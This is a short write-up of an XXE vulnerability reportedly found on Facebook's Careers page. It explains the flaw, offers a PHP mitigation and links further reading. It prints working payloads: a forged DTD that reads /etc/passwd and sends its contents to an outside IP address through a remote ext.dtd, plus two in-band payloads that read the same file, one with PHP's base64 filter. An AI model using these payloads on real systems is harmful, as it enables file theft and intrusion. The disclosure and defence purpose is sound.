An XML External Entity (XXE) vulnerability was found on the Facebook Careers page by Mohamed Ramadan.
The OWASP XXE Definition reads:
An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, port scanning from the perspective of the machine where the parser is located, and other system impacts.
In this case a forged .docx
(which is in fact XML) including a custom DTD was uploaded. As that DTD pointed towards a URL under the hacker his control:
1. Uploaded XML:
<!DOCTYPE root [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://197.xxx.xxx.90/ext.dtd">
%dtd;
%send;
]]>
2. The ext.dtd
file (on a server you control):
<!ENTITY % all
"<!ENTITY % % send SYSTEM 'http://197.xxx.xxx.90/FACEBOOK-HACKED?%file;'>"
>
%all;
As the contents of ext.dtd
are processed on the server which received the payload, a request to http://197.xxx.xxx.90/FACEBOOK-HACKED…
along with the contents of the file
entity (!!) attached to it will be made by the server.
How I Hacked Facebook with a Word Document →
Note: To fix this in PHP call libxml_disable_entity_loader(true);
in your code. If you don’t, XML files like this one can do nasty stuff (yes, that reads in /etc/passwd
and shows it onscreen):
<!DOCTYPE test [ <!ENTITY xxeattack SYSTEM "file:///etc/passwd"> ]>
<xxx>&xxeattack;</xxx>
A somewhat altered version is this one, which uses PHP. The result is a single base64-encode string which you can attach as a querystring parameter to a URL:
<!DOCTYPE scan [ <!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]>
<scan>&test;</scan>
Recommended further reading:
- Facebook Remote Code Execution using XXE in OpenID, which triggered the hack described above.
- Revisting XXE and abusing protocols, which goes further on the link above and explains a bit more (and has some nice code to wrap your head around).
- What You Didn’t Know About XML External Entities Attacks, which describes the methods used in the hack described above
- Bilion Laughs, a DoS attack also based on XML Entities.